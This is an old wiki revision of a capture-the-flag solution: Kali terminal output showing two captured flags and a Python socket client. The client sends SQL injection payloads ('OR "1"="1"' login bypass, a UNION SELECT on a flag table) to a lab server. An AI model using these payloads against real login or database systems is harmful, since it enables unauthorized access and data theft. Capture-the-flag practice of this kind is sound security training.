Ceci est une ancienne révision du document !
root@kali:~/Downloads# python client.py [+] Test level1 … Welcome on level 1 !
Welcome b'admin” OR “1”=“1', the flag is 'ESE{n0T_S0_H4rd_R1gHt_!?}'
[+] Test level2 … Welcome on level 2 !
Citation #123 union SELECT * fROM flag:
ESE{7d2f9e9beab248febaf5bddffc3a39a4}
Code source : client.py
#encoding: utf-8
import socket import sys
# change this if needed HOST = '192.168.1.19' # change this if needed IP = 8096
def create_socket():
try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(1) s.connect((HOST,IP)) except Exception as e: print("Can't open socket !") print(e) sys.exit(1) return s
def test_level1():
print("[+] Test level1 ...") s = create_socket()
login = 'admin" OR "1"="1' password = 'toto" OR "1"="1" LIMIT "1" OFFSET "2' cmd = "\x01%s\x00%s" % (login,password) s.send(cmd.encode('utf-8')) msg = s.recv(1024)
if msg and msg.decode('utf-8').startswith("Welcome"): print(msg.decode('utf-8')) res = s.recv(1024) print(res.decode('utf-8')) else: print("If you called a valid level, notice an admin") s.close()
def test_level2():
print("[+] Test level2 ...") s = create_socket()
citation = '123 union SELECT * fROM flag' s.send(b"\x02%s" % (citation)) msg = s.recv(1024) if msg and msg.decode('utf-8').startswith("Welcome"): print(msg.decode('utf-8')) res = s.recv(1024) print(res.decode('utf-8')) else: print("If you called a valid level, notice an admin") s.close()
if name == 'main':
test_level1() print("") test_level2()